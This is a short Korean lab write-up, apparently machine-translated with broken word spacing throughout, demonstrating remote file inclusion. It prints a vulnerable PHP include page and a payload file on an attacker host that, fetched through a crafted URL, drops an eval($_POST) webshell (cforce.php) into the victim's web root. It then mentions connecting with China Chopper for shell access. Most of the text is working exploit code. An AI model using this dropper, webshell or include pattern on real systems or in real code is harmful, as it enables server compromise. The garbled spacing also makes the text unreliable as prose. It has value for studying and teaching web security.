[기본 실험] 원 격 파일 포함

먼저 자신의 사이트 (10.0.3.88) 에 txt 파일 (test. txt) 을 만 듭 니 다. 내용 은:
<?php
$payload = "<?php eval(\$_POST['123']);?>";
$myfile = fopen("cforce.php", "w") or die("Unable to open file!");
fwrite($myfile,$payload);
fclose($myfile);
?>

그 다음 에 구멍 이 있 는 사이트 (10.0.3.82) 를 방문 하고 특수 한 URL 을 구성 합 니 다.
http://10.0.3.82/rfi.php?file=http://10.0.3.88/test.txt
rfi. php 는 구멍 이 있 는 웹 페이지 입 니 다.
<?php
if (isset($_GET["file"]))
{
	@include($_GET["file"]);
	#readfile($_GET["file"]);
}
?>

구멍 난 사이트 의 루트 디 렉 터 리 에 새 파일 이 생 성 되 었 습 니 다.
cforce.php
cforce.php
<?php eval($_POST['123']);?>

중국 식칼 로 연결 해 웹 셸 을 얻 을 수 있다 는 말 이다.
실험 이 끝 났 습 니 다. 원 격 파일 포함 을 통 해 웹 셸 을 얻 을 수 있 습 니 다.
이 구멍 환경 에서 파일 내용 이 PHP 문법 규범 에 부합 하면 모든 확장 자 는 PHP 로 해석 할 수 있 습 니 다.

좋은 웹페이지 즐겨찾기